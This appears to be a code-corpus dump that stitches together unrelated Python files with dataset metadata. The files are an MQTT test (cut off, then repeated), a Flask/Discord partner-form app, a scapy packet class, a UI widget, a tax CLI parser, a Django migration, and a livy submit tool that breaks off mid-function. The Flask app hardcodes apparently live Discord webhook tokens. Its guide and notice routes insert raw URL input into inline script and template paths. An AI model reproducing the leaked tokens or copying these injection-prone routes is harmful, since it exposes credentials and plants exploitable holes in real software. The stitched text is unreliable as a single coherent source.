4.5,
3.9,
6.5
]
EXPECTED = [
2.5,
4.1,
4.5,
6.5
]
def msg_to_event(msg):
return SensorEvent(sensor_id=msg[0], ts=msg[1], val=msg[2])
CHARS=string.ascii_letters+string.digits
def get_topic_name(test_class):
return test_class.__class__.__name__ + ''.join([ choice(CHARS) for i in range(5) ])
@unittest.skipUnless(HBMQTT_AVAILABLE,
"HBMQTT library not installed for python at %s" %
sys.executable)
class TestCase(unittest.TestCase):
def setUp(self):
# Creating a new event loop each test case does not seem to work.
# I think it is due to hbmqtt not cleaning up some state in the asyncio
# layer.
#self.loop = asyncio.new_event_loop()
self.loop = asyncio.get_event_loop()
self.sched = Scheduler(self.loop)
def tearDown(self):
pass
#self.loop.stop()
#self.loop.close()
def test_client_only(self):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
self.sched.schedule_periodic(sensor, 0.5)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
print("test_client_only completed")
def send_and_recv_body(self, sleep_timeout):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
qr = QueueReader(URL, TOPIC, self.sched, timeout=sleep_timeout)
self.sched.schedule_periodic(sensor, 0.5)
stop_qr = self.sched.schedule_on_main_event_loop(qr)
vs = ValidateAndStopSubscriber(EXPECTED, self, stop_qr)
qr.select(msg_to_event).subscribe(vs)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
self.assertEqual(qr.state, QueueReader.FINAL_STATE)
self.assertEqual(vs.next_idx, len(EXPECTED))
print("send_and_recv_bod(%s) completed" % sleep_timeout)
def test_short_timeout(self):
self.send_and_recv_body(0.1)
def test_long_timeout(self):
self.send_and_recv_body(3.0)
if __name__ == '__main__':
unittest.main()
| # Copyright 2017 by MPI-SWS and Data-Ken Research.
# Licensed under the Apache 2.0 License.
"""Test async version of mqtt libraries. Depends on hbmqtt
(https://github.com/beerfactory/hbmqtt)
"""
import unittest
import sys
import asyncio
import string
from random import choice, seed
from antevents.base import Scheduler, SensorPub, SensorEvent
import antevents.linq.output
import antevents.linq.combinators
import antevents.linq.select
from antevents.adapters.mqtt_async import QueueWriter, QueueReader
from antevents.linq.transducer import PeriodicMedianTransducer
from utils import ValueListSensor, ValidateAndStopSubscriber
seed()
try:
import hbmqtt
HBMQTT_AVAILABLE = True
except ImportError:
HBMQTT_AVAILABLE = False
URL = "mqtt://localhost:1883"
VALUES = [
1.0,
2.5,
3.7,
4.1,
8.1,
0.5,
6.5,
4.5,
3.9,
6.5
]
EXPECTED = [
2.5,
4.1,
4.5,
6.5
]
def msg_to_event(msg):
return SensorEvent(sensor_id=msg[0], ts=msg[1], val=msg[2])
CHARS=string.ascii_letters+string.digits
def get_topic_name(test_class):
return test_class.__class__.__name__ + ''.join([ choice(CHARS) for i in range(5) ])
@unittest.skipUnless(HBMQTT_AVAILABLE,
"HBMQTT library not installed for python at %s" %
sys.executable)
class TestCase(unittest.TestCase):
def setUp(self):
# Creating a new event loop each test case does not seem to work.
# I think it is due to hbmqtt not cleaning up some state in the asyncio
# layer.
#self.loop = asyncio.new_event_loop()
self.loop = asyncio.get_event_loop()
self.sched = Scheduler(self.loop)
def tearDown(self):
pass
#self.loop.stop()
#self.loop.close()
def test_client_only(self):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
self.sched.schedule_periodic(sensor, 0.5)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
print("test_client_only completed")
def send_and_recv_body(self, sleep_timeout):
SENSOR_ID='sensor-1'
TOPIC=get_topic_name(self)
sensor = SensorPub(ValueListSensor(SENSOR_ID, VALUES))
td = sensor.transduce(PeriodicMedianTransducer(period=3))
qw = QueueWriter(td, URL, TOPIC, self.sched)
qw.output()
qr = QueueReader(URL, TOPIC, self.sched, timeout=sleep_timeout)
self.sched.schedule_periodic(sensor, 0.5)
stop_qr = self.sched.schedule_on_main_event_loop(qr)
vs = ValidateAndStopSubscriber(EXPECTED, self, stop_qr)
qr.select(msg_to_event).subscribe(vs)
self.sched.run_forever()
self.assertFalse(qw.has_pending_requests(),
"QueueWriter has pending requests: %s" % qw.dump_state())
self.assertEqual(qr.state, QueueReader.FINAL_STATE)
self.assertEqual(vs.next_idx, len(EXPECTED))
print("send_and_recv_bod(%s) completed" % sleep_timeout)
def test_short_timeout(self):
self.send_and_recv_body(0.1)
def test_long_timeout(self):
self.send_and_recv_body(3.0)
if __name__ == '__main__':
unittest.main() | pt | 0.169016 | 2.116433 | 2 |
edit/main.py | team-alpha-kr/Partner-pyWeb | 0 | 13510 | <filename>edit/main.py
# -*- coding: utf8 -*-
import os
from flask import Flask, request, render_template, request, redirect, url_for, jsonify
from flask_discord import DiscordOAuth2Session, requires_authorization
from discord import Webhook, RequestsWebhookAdapter
webhook = Webhook.partial(814742019489660939, "rvSBVHtGPflSASjeGEEKdZxC5Z_w1UM_ovc_xD0ZPcFy1UeUybFM4ClGANu6CEWTQame", adapter=RequestsWebhookAdapter())
run_webhook = Webhook.partial(804602090537091072, "6ZMww14Nh7OVeeHUt5bWeixreoWQmSzPVfFmIpU3BEr8OYLGqickY1VyoqH2IeMs1Kd8", adapter=RequestsWebhookAdapter())
app = Flask(__name__)
app.secret_key = b"<KEY>"
os.environ["OAUTHLIB_INSECURE_TRANSPORT"] = "false"
app.config["DISCORD_CLIENT_ID"] = "801279922722045962"
app.config["DISCORD_CLIENT_SECRET"] = "<KEY>" # Discord client secret.
# app.config["DISCORD_REDIRECT_URI"] = "http://localhost:3333/callback" # URL to your callback endpoint.
app.config["DISCORD_REDIRECT_URI"] = "https://partner-e.alphakr.xyz/callback" # URL to your callback endpoint.
app.config["DISCORD_BOT_TOKEN"] = "<KEY>"
discord = DiscordOAuth2Session(app)
def on_json_loading_failed_return_dict(e):
return '없음'
@app.route('/', methods=['GET','POST'])
def index():
return render_template('form/1.html')
@app.route("/login", methods=["GET"])
def login():
if not discord.authorized:
return discord.create_session(scope=['guilds', 'email', 'identify'])
else:
return render_template("login.html")
@app.route("/callback", methods=["GET", "POST"])
def callback():
data = discord.callback()
redirect_to = data.get("redirect", "/form/1")
return redirect(redirect_to)
@app.route("/logout", methods=['GET', 'POST'])
def logout():
if discord.authorized:
discord.revoke()
return redirect(url_for("index"))
else:
return redirect(url_for("index"))
@app.route('/form/1', methods=['GET','POST'])
def form1():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
return render_template('form/1.html', user=user)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/2', methods=['GET','POST'])
def form2():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
return render_template('form/2.html', code=code, nickname=nickname)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/3', methods=['GET','POST'])
def form3():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
return render_template('form/3.html', code=code, nickname=nickname, server=server, member=member, category=category, etc_text=etc_text)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/action', methods=['GET','POST'])
def action():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
message = request.form['message']
image = request.form['image']
video = request.form['video']
if etc_text == '':
etc_text = 'Unknown'
webhook.send(f"<@<PASSWORD>56043785>\n✅ 파트너 수정 신청이 도착했습니다.\n\n파트너 코드: {code}\n신청자: {nickname}\n서버(초대 링크): {server}\n멤버 수: {member}\n카테고리 정보: {category} ({etc_text})\n홍보지: {message}\n이미지: {image}\n영상: {video}")
return render_template('form/action.html', code = code)
else: #로그인이 안되어있는가?
return redirect(url_for("index"))
@app.route('/guide/<id>', methods=['GET', 'POST'])
def guide(id):
return f"<script>location.replace('https://team-alpha-kr.github.io/Partner-Guide/{id}.html');</script>"
# S: 2021 파트너 웹사이트 개편 코드
# S: 210210 공지사항
@app.route('/notice/<id>', methods=['GET', 'POST'])
def notice(id):
return render_template(f"2021temp/notice/{id}.html")
# E: 210210 공지사항
# E: 2021 파트너 웹사이트 개편 코드
@app.errorhandler(404)
def page_not_found(error):
return render_template("error/404.html")
@app.errorhandler(500)
def servererror(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 500 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/500.html")
@app.errorhandler(400)
def badrequest(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 400 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/400.html")
run_webhook.send("✅ 파트너 정보 수정 - 웹사이트가 실행이 되었습니다!")
app.run(host='0.0.0.0', port=3333, debug=False) | <filename>edit/main.py
# -*- coding: utf8 -*-
import os
from flask import Flask, request, render_template, request, redirect, url_for, jsonify
from flask_discord import DiscordOAuth2Session, requires_authorization
from discord import Webhook, RequestsWebhookAdapter
webhook = Webhook.partial(814742019489660939, "rvSBVHtGPflSASjeGEEKdZxC5Z_w1UM_ovc_xD0ZPcFy1UeUybFM4ClGANu6CEWTQame", adapter=RequestsWebhookAdapter())
run_webhook = Webhook.partial(804602090537091072, "6ZMww14Nh7OVeeHUt5bWeixreoWQmSzPVfFmIpU3BEr8OYLGqickY1VyoqH2IeMs1Kd8", adapter=RequestsWebhookAdapter())
app = Flask(__name__)
app.secret_key = b"<KEY>"
os.environ["OAUTHLIB_INSECURE_TRANSPORT"] = "false"
app.config["DISCORD_CLIENT_ID"] = "801279922722045962"
app.config["DISCORD_CLIENT_SECRET"] = "<KEY>" # Discord client secret.
# app.config["DISCORD_REDIRECT_URI"] = "http://localhost:3333/callback" # URL to your callback endpoint.
app.config["DISCORD_REDIRECT_URI"] = "https://partner-e.alphakr.xyz/callback" # URL to your callback endpoint.
app.config["DISCORD_BOT_TOKEN"] = "<KEY>"
discord = DiscordOAuth2Session(app)
def on_json_loading_failed_return_dict(e):
return '없음'
@app.route('/', methods=['GET','POST'])
def index():
return render_template('form/1.html')
@app.route("/login", methods=["GET"])
def login():
if not discord.authorized:
return discord.create_session(scope=['guilds', 'email', 'identify'])
else:
return render_template("login.html")
@app.route("/callback", methods=["GET", "POST"])
def callback():
data = discord.callback()
redirect_to = data.get("redirect", "/form/1")
return redirect(redirect_to)
@app.route("/logout", methods=['GET', 'POST'])
def logout():
if discord.authorized:
discord.revoke()
return redirect(url_for("index"))
else:
return redirect(url_for("index"))
@app.route('/form/1', methods=['GET','POST'])
def form1():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
return render_template('form/1.html', user=user)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 1단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/2', methods=['GET','POST'])
def form2():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
return render_template('form/2.html', code=code, nickname=nickname)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 2단계 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/3', methods=['GET','POST'])
def form3():
if request.method == 'POST':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
return render_template('form/3.html', code=code, nickname=nickname, server=server, member=member, category=category, etc_text=etc_text)
else: #로그인이 안되어있는가?
return redirect(url_for("login"))
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
@app.route('/form/action', methods=['GET','POST'])
def action():
if request.method == 'GET':
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
user = discord.fetch_user()
run_webhook.send(f"⛔ [ 403 ERROR ] {user}님이 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else: #로그인이 안되어있는가?
ip = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
run_webhook.send(f"⛔ [ 403 ERROR ] 비 로그인 유저({ip})가 파트너 신청 결과 전송 페이지에 정상적이지 않은 접근을 시도 했습니다.")
return "<script>alert('정상적이지 않은 접근입니다.');location.replace('/');</script>"
else:
if discord.authorized: #로그인이 되어있는가
try:
discord.fetch_guilds() #로그인정보을 가져와라
except:
return redirect(url_for("logout")) #못가져오면 로그아웃
code = request.form['code']
nickname = request.form['nickname']
server = request.form['server']
member = request.form['member']
category = request.form['category']
etc_text = request.form['etc_text']
message = request.form['message']
image = request.form['image']
video = request.form['video']
if etc_text == '':
etc_text = 'Unknown'
webhook.send(f"<@<PASSWORD>56043785>\n✅ 파트너 수정 신청이 도착했습니다.\n\n파트너 코드: {code}\n신청자: {nickname}\n서버(초대 링크): {server}\n멤버 수: {member}\n카테고리 정보: {category} ({etc_text})\n홍보지: {message}\n이미지: {image}\n영상: {video}")
return render_template('form/action.html', code = code)
else: #로그인이 안되어있는가?
return redirect(url_for("index"))
@app.route('/guide/<id>', methods=['GET', 'POST'])
def guide(id):
return f"<script>location.replace('https://team-alpha-kr.github.io/Partner-Guide/{id}.html');</script>"
# S: 2021 파트너 웹사이트 개편 코드
# S: 210210 공지사항
@app.route('/notice/<id>', methods=['GET', 'POST'])
def notice(id):
return render_template(f"2021temp/notice/{id}.html")
# E: 210210 공지사항
# E: 2021 파트너 웹사이트 개편 코드
@app.errorhandler(404)
def page_not_found(error):
return render_template("error/404.html")
@app.errorhandler(500)
def servererror(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 500 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/500.html")
@app.errorhandler(400)
def badrequest(error):
run_webhook.send(f"<@673776952578146315> ⛔ [ 400 ERROR ] 서버에 오류가 발생했습니다.")
return render_template("error/400.html")
run_webhook.send("✅ 파트너 정보 수정 - 웹사이트가 실행이 되었습니다!")
app.run(host='0.0.0.0', port=3333, debug=False) | ko | 1.00007 | 2.744826 | 3 |
protocols/tpkt.py | dparnishchev/s7scan | 98 | 13511 | from scapy.fields import ByteField, ShortField
from scapy.packet import Packet
class TPKT(Packet):
name = "TPKT"
fields_desc = [ByteField("version", 3),
ByteField("reserved", 0),
ShortField("length", 0x0000)]
| from scapy.fields import ByteField, ShortField
from scapy.packet import Packet
class TPKT(Packet):
name = "TPKT"
fields_desc = [ByteField("version", 3),
ByteField("reserved", 0),
ShortField("length", 0x0000)]
| none | 1 | 2.327009 | 2 |
pylbm_ui/widgets/message.py | pylbm/pylbm_ui | 3 | 13512 | <reponame>pylbm/pylbm_ui
import ipyvuetify as v
class Message(v.Container):
def __init__(self, message):
self.message = v.Alert(
children=[f'{message}...'],
class_='primary--text'
)
super().__init__(
children=[
v.Row(
children=[
v.ProgressCircular(
indeterminate=True,
color='primary',
size=70,
width=4
)
],
justify='center'
),
v.Row(
children=[
self.message,
],
justify='center'
)
]
)
def update(self, new_message):
self.message.children = [f'{new_message}...'] | import ipyvuetify as v
class Message(v.Container):
def __init__(self, message):
self.message = v.Alert(
children=[f'{message}...'],
class_='primary--text'
)
super().__init__(
children=[
v.Row(
children=[
v.ProgressCircular(
indeterminate=True,
color='primary',
size=70,
width=4
)
],
justify='center'
),
v.Row(
children=[
self.message,
],
justify='center'
)
]
)
def update(self, new_message):
self.message.children = [f'{new_message}...'] | none | 1 | 2.355824 | 2 |
args_parser.py | vmartinv/capital_gains_calculator | 0 | 13513 | import argparse
import datetime
def get_last_elapsed_tax_year() -> int:
now = datetime.datetime.now()
if now.date() >= datetime.date(now.year, 4, 6):
return now.year - 1
else:
return now.year - 2
def create_parser() -> argparse.ArgumentParser:
# Schwab transactions
# Montly GBP/USD history from
# https://www.gov.uk/government/collections/exchange-rates-for-customs-and-vat
default_gbp_history_file = "GBP_USD_monthly_history.csv"
# Initial vesting and spin-off prices
default_initial_prices_file = "initial_prices.csv"
default_pdf_report = "calculations.pdf"
parser = argparse.ArgumentParser(
description="Calculate capital gains from stock transactions.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--tax_year",
type=int,
default=get_last_elapsed_tax_year(),
nargs="?",
help="First year of the tax year to calculate gains on",
)
parser.add_argument(
"--schwab",
type=str,
nargs="?",
help="file containing the exported transactions from Schwab",
)
parser.add_argument(
"--trading212",
type=str,
nargs="?",
help="folder containing the exported transaction files from Trading212",
)
parser.add_argument(
"--gbp_history",
type=str,
default=default_gbp_history_file,
nargs="?",
help="monthly GBP/USD prices from HMRC",
)
parser.add_argument(
"--initial_prices",
type=str,
default=default_initial_prices_file,
nargs="?",
help="file cointaining stock prices in USD at the moment of vesting, split, etc.",
)
parser.add_argument(
"--report",
type=str,
default=default_pdf_report,
nargs="?",
help="where to save the generated pdf report",
)
return parser
| import argparse
import datetime
def get_last_elapsed_tax_year() -> int:
now = datetime.datetime.now()
if now.date() >= datetime.date(now.year, 4, 6):
return now.year - 1
else:
return now.year - 2
def create_parser() -> argparse.ArgumentParser:
# Schwab transactions
# Montly GBP/USD history from
# https://www.gov.uk/government/collections/exchange-rates-for-customs-and-vat
default_gbp_history_file = "GBP_USD_monthly_history.csv"
# Initial vesting and spin-off prices
default_initial_prices_file = "initial_prices.csv"
default_pdf_report = "calculations.pdf"
parser = argparse.ArgumentParser(
description="Calculate capital gains from stock transactions.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--tax_year",
type=int,
default=get_last_elapsed_tax_year(),
nargs="?",
help="First year of the tax year to calculate gains on",
)
parser.add_argument(
"--schwab",
type=str,
nargs="?",
help="file containing the exported transactions from Schwab",
)
parser.add_argument(
"--trading212",
type=str,
nargs="?",
help="folder containing the exported transaction files from Trading212",
)
parser.add_argument(
"--gbp_history",
type=str,
default=default_gbp_history_file,
nargs="?",
help="monthly GBP/USD prices from HMRC",
)
parser.add_argument(
"--initial_prices",
type=str,
default=default_initial_prices_file,
nargs="?",
help="file cointaining stock prices in USD at the moment of vesting, split, etc.",
)
parser.add_argument(
"--report",
type=str,
default=default_pdf_report,
nargs="?",
help="where to save the generated pdf report",
)
return parser
| es | 0.131111 | 3.130347 | 3 |
src/pydts/examples_utils/datasets.py | tomer1812/pydts | 0 | 13514 | import pandas as pd
from pydts.config import *
DATASETS_DIR = os.path.join(os.path.dirname((os.path.dirname(__file__))), 'datasets')
def load_LOS_simulated_data():
os.path.join(os.path.dirname(__file__))
return pd.read_csv(os.path.join(DATASETS_DIR, 'LOS_simulated_data.csv')) | import pandas as pd
from pydts.config import *
DATASETS_DIR = os.path.join(os.path.dirname((os.path.dirname(__file__))), 'datasets')
def load_LOS_simulated_data():
os.path.join(os.path.dirname(__file__))
return pd.read_csv(os.path.join(DATASETS_DIR, 'LOS_simulated_data.csv')) | none | 1 | 2.498811 | 2 |
busker/migrations/0013_auto_20200906_1933.py | tinpan-io/django-busker | 2 | 13515 | <gh_stars>1-10
# Generated by Django 3.1.1 on 2020-09-06 19:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('busker', '0012_auto_20200905_2042'),
]
operations = [
migrations.AlterModelOptions(
name='downloadcode',
options={'ordering': ['id']},
),
migrations.AlterField(
model_name='file',
name='work',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='busker.downloadablework'),
),
]
| # Generated by Django 3.1.1 on 2020-09-06 19:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('busker', '0012_auto_20200905_2042'),
]
operations = [
migrations.AlterModelOptions(
name='downloadcode',
options={'ordering': ['id']},
),
migrations.AlterField(
model_name='file',
name='work',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='files', to='busker.downloadablework'),
),
] | fr | 0.13841 | 1.372627 | 1 |
livy/cli/submit.py | tzing/python-livy | 1 | 13516 | """Submit a batch task to livy server."""
import argparse
import datetime
import importlib
import json
import logging
import re
import typing
import livy
import livy.cli.config
import livy.cli.logging
logger = logging.getLogger(__name__)
class PreSubmitArguments(argparse.Namespace):
"""Typed :py:class:`~argparse.Namespace` for arguments before task submission."""
# task
script: str
args: typing.List[str]
class_name: str
jars: typing.List[str]
py_files: typing.List[str]
files: typing.List[str]
archives: typing.List[str]
queue_name: str
session_name: str
api_url: str
driver_memory: str
driver_cores: int
executor_memory: str
executor_cores: int
num_executors: int
spark_conf: typing.List[typing.Tuple[str, str]]
# log
watch_log: bool
# time
time_prog_start: datetime.datetime
"Local time this script is called"
class TaskEndedArguments(PreSubmitArguments):
"""Typed :py:class:`~argparse.Namespace` for arguments when task is ended.
It contains all attributes from :py:class:`~livy.cli.submit.PreSubmitArguments`.
"""
# task
batch_id: int
"Batch ID response by livy server"
state: str
"Task ended state"
# time
time_task_submit: datetime.datetime
"Local time before task is submitted"
time_task_ended: datetime.datetime
"Local time that detected task is ended"
def main(argv=None):
"""CLI entrypoint"""
# parse argument
cfg = livy.cli.config.load()
parser = argparse.ArgumentParser(
prog="livy submit",
description=__doc__,
)
parser.add_argument(
"script",
help="Path to the script that contains the application to be executed",
)
parser.add_argument(
"args",
nargs="*",
help="Arguments for the task script",
)
parser.add_argument(
"--class-name",
metavar="COM.EXAMPLE.FOO",
help="Application Java/Spark main class (for Java/Scala task)",
)
parser.add_argument(
"--jars",
nargs="+",
metavar="FOO.JAR",
help="Java dependencies to be used in this batch",
)
parser.add_argument(
"--py-files",
nargs="+",
metavar="FOO.ZIP",
help="Python dependencies to be used in this batch",
)
parser.add_argument(
"--files",
nargs="+",
metavar="FOO.TXT",
help="Files to be used in this batch",
)
parser.add_argument(
"--archives",
nargs="+",
metavar="FOO.TAR",
help="Archives to be used in this batch",
)
parser.add_argument(
"--queue-name",
metavar="DEFAULT",
help="The name of the YARN queue to which submitted",
)
parser.add_argument(
"--session-name",
metavar="HELLO",
help="The session name to execute this batch",
)
group = parser.add_argument_group("pre-submit actions")
group.add_argument(
"--on-pre-submit",
metavar="PLUG",
nargs="+",
default=cfg.submit.pre_submit,
help="Run plugin(s) before submit",
)
group = parser.add_argument_group("livy server configuration")
group.add_argument(
"--api-url",
required=cfg.root.api_url is None,
default=cfg.root.api_url,
help="Base-URL for Livy API server",
)
group.add_argument(
"--driver-memory",
metavar="10G",
default=cfg.submit.driver_memory,
type=argmem,
help="Amount of memory to use for the driver process.",
)
group.add_argument(
"--driver-cores",
metavar="N",
default=cfg.submit.driver_cores,
type=int,
help="Number of cores to use for the driver process.",
)
group.add_argument(
"--executor-memory",
metavar="10G",
default=cfg.submit.executor_memory,
type=argmem,
help="Amount of memory to use for the executor process.",
)
group.add_argument(
"--executor-cores",
metavar="N",
default=cfg.submit.executor_cores,
type=int,
help="Number of cores to use for each executor.",
)
group.add_argument(
"--num-executors",
metavar="N",
default=cfg.submit.num_executors,
type=int,
help="Number of executors to launch for this batch.",
)
group.add_argument(
"--spark-conf",
metavar="CONF_NAME=VALUE",
nargs="+",
default=cfg.submit.spark_conf,
type=argkvpair,
help="Spark configuration properties.",
)
group = parser.add_argument_group("post-submit actions")
g = group.add_mutually_exclusive_group()
g.set_defaults(watch_log=cfg.submit.watch_log)
g.add_argument(
"--watch-log",
dest="watch_log",
action="store_true",
help="Watching for logs until it is finished",
)
g.add_argument(
"--no-watch-log",
dest="watch_log",
action="store_false",
help="Not to watch for logs. Only submit the task and quit.",
)
group = parser.add_argument_group("after-task-finish actions")
group.add_argument(
"--on-task-success",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_success,
help="Run plugin(s) on task is finished and success",
)
group.add_argument(
"--on-task-failed",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and failed",
)
group.add_argument(
"--on-task-ended",
metavar="PLUG",
nargs="+",
default=cfg.submit.task_fail,
help="Run plugin(s) on task is ended and ended and regardless to its state",
)
livy.cli.logging.setup_argparse(parser)
args: PreSubmitArguments = parser.parse_args(argv)
# time stamping
tzlocal = datetime.datetime.now(datetime.timezone.utc).astimezone().tzinfo
